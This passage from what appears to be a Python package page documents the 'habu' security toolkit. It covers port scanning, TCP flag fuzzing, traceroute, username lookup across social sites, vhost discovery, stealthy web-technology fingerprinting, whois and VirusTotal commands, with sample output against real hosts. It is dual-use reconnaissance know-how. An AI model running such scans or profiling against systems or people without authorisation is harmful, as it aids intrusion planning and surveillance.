and configurations responds to packet with various flag combinations.
Example:
# habu.tcpflags www.portantier.com
S -> SA
FS -> SA
FA -> R
SA -> R
By default, the command sends all possible flag combinations. You can
specify which flags must ever be present (reducing the quantity of
possible combinations), with the option '-f'.
Also, you can specify which flags you want to be present on the response
packets to show, with the option '-r'.
With the next command, you see all the possible combinations that have the
FIN (F) flag set and generates a response that contains the RST (R) flag.
Example:
# habu.tcpflags -f F -r R www.portantier.com
FPA -> R
FSPA -> R
FAU -> R
Options:
-p INTEGER Port to use (default: 80)
-f TEXT Flags that must be sent ever (default: fuzz with all flags)
-r TEXT Filter by response flags (default: show all responses)
-v Verbose
--help Show this message and exit.habu.tcpscan
Usage: habu.tcpscan [OPTIONS] IP
TCP Port Scanner.
Print the ports that generated a response with the SYN flag or (if show
use -a) all the ports that generated a response.
It's really basic compared with nmap, but who is comparing?
Example:
# habu.tcpscan -p 22,23,80,443 -s 1 45.77.113.133
22 S -> SA
80 S -> SA
443 S -> SA
Options:
-p TEXT Ports to use (default: 80) example: 20-23,80,135
-i TEXT Interface to use
-f TEXT Flags to use (default: S)
-s TEXT Time between probes (default: send all together)
-t INTEGER Timeout for each probe (default: 2 seconds)
-a Show all responses (default: Only containing SYN flag)
-v Verbose output
--help Show this message and exit.habu.traceroute
Usage: habu.traceroute [OPTIONS] IP
TCP traceroute.
Identify the path to a destination getting the ttl-zero-during-transit
messages.
Note: On the internet, you can have various valid paths to a device.
Example:
# habu.traceroute 45.77.113.133
IP / ICMP 192.168.0.1 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
IP / ICMP 10.242.4.197 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
IP / ICMP 200.32.127.98 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
.
IP / ICMP 4.16.180.190 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
.
IP / TCP 45.77.113.133:http > 192.168.0.5:ftp_data SA / Padding
Note: It's better if you use a port that is open on the remote system.
Options:
-p INTEGER Port to use (default: 80)
-i TEXT Interface to use
--help Show this message and exit.habu.usercheck
Usage: habu.usercheck [OPTIONS] USERNAME
Check if the given username exists on various social networks and other
popular sites.
$ habu.usercheck portantier
{
"aboutme": "https://about.me/portantier",
"disqus": "https://disqus.com/by/portantier/",
"github": "https://github.com/portantier/",
"ifttt": "https://ifttt.com/p/portantier",
"lastfm": "https://www.last.fm/user/portantier",
"medium": "https://medium.com/@portantier",
"pastebin": "https://pastebin.com/u/portantier",
"pinterest": "https://in.pinterest.com/portantier/",
"twitter": "https://twitter.com/portantier",
"vimeo": "https://vimeo.com/portantier"
}
Options:
-c Disable cache
-v Verbose output
-w Open each valid url in a webbrowser
--help Show this message and exit.habu.vhosts
Usage: habu.vhosts [OPTIONS] HOST
Use Bing to query the websites hosted on the same IP address.
$ habu.vhosts www.telefonica.com
www.telefonica.com -> 212.170.36.79
[
'www.telefonica.es',
'universitas.telefonica.com',
'www.telefonica.com',
]
Options:
-c Disable cache
-p INTEGER Pages count (Default: 10)
-f INTEGER First result to get (Default: 1)
--help Show this message and exit.habu.virustotal
Usage: habu.virustotal [OPTIONS] INPUT
Send a file to VirusTotal https://www.virustotal.com/ and print the report
in JSON format.
Note: Before send a file, will check if the file has been analyzed before
(sending the sha256 of the file), if a report exists, no submission will
be made, and you will see the last report.
$ habu.virustotal meterpreter.exe
Verifying if hash already submitted: f4826b219aed3ffdaa23db26cfae611979bf215984fc71a1c12f6397900cb70d
Sending file for analysis
Waiting/retrieving the report...
{
"md5": "0ddb015b5328eb4d0cc2b87c39c49686",
"permalink": "https://www.virustotal.com/file/c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23/analysis/1526850717/",
"positives": 49,
"resource": "c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23",
"response_code": 1,
"scan_date": "2018-05-20 21:11:57",
"scan_id": "c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23-1526850717",
"scans": {
"ALYac": {
"detected": true,
"result": "Trojan.CryptZ.Gen",
"update": "20180520",
"version": "1.1.1.5"
},
... The other scanners ...
},
"sha1": "5fa33cab1729480dd023b08f7b91a945c16d0a9e",
"sha256": "c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23",
"total": 67,
"verbose_msg": "Scan finished, information embedded"
}
Options:
-v Verbose output
--help Show this message and exit.habu.web.report
Usage: habu.web.report [OPTIONS] [INPUT_FILE]
Makes a report that includes HTTP headers of websites.
Optionally, uses Firefox or Chromium to take a screenshot of the websites.
The expected format is one url per line.
Creates a directory called 'report' with the content inside.
$ echo https://www.portantier.com | habu.web.report
Options:
-v Verbose output
-s Take a screenshot for each website
-b [firefox|chromium-browser] Browser to use for screenshot.
--help Show this message and exit.habu.web.screenshot
Usage: habu.web.screenshot [OPTIONS] URL
Uses Firefox or Chromium to take a screenshot of the website.
$ habu.web.screenshot https://www.portantier.com
Options:
-b [firefox|chromium-browser] Browser to use for screenshot.
-o TEXT Output file. (default: screenshot.png)
--help Show this message and exit.habu.web.tech
Usage: habu.web.tech [OPTIONS] URL
Use Wappalyzer apps.json database to identify technologies used on a web
application.
Reference: https://github.com/AliasIO/Wappalyzer
Note: This tool only sends one request. So, it's stealth and not
suspicious.
$ habu.web.tech https://woocomerce.com
{
"Nginx": {
"categories": [
"Web Servers"
]
},
"PHP": {
"categories": [
"Programming Languages"
]
},
"WooCommerce": {
"categories": [
"Ecommerce"
],
"version": "6.3.1"
},
"WordPress": {
"categories": [
"CMS",
"Blogs"
]
},
}
Options:
-c Disable cache
-v Verbose output
--help Show this message and exit.habu.whois.domain
Usage: habu.whois.domain [OPTIONS] DOMAIN
Simple whois client to check domain names.
Example:
$ habu.whois.domain portantier.com
{
"domain_name": "portantier.com",
"registrar": "Amazon Registrar, Inc.",
"whois_server": "whois.registrar.amazon.com",
...
Options:
--help Show this message and exit.habu.whois.ip
Usage: habu.whois.ip [OPTIONS] IP
Simple whois client to check IP addresses (IPv4 and IPv6).
Example:
$ habu.whois.ip 8.8.8.8
{
"nir": null,
"asn_registry": "arin",
"asn": "15169",
"asn_cidr": "8.8.8.0/24",
"asn_country_code": "US",
"asn_date": "1992-12-01",
"asn_description": "GOOGLE - Google LLC, US",
"query": "8.8.8.8",
...
Options:
--help Show this message and exit.habu.xor
Usage: habu.xor [OPTIONS]
XOR cipher.
Note: XOR is not a 'secure cipher'. If you need strong crypto you must use
algorithms like AES. You can use habu.fernet for that.
Example:
$ habu.xor -k mysecretkey -i /bin/ls > xored
$ habu.xor -k mysecretkey -i xored > uxored
$ sha1sum /bin/ls uxored
$ 6fcf930fcee1395a1c95f87dd38413e02deff4bb /bin/ls
$ 6fcf930fcee1395a1c95f87dd38413e02deff4bb uxored
Options:
-k TEXT Encryption key
-i FILENAME Input file (default: stdin)
-o FILENAME Output file (default: stdout)
--help Show this message and exit.Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
habu-0.1.24.tar.gz
(501.8 kB
view hashes)
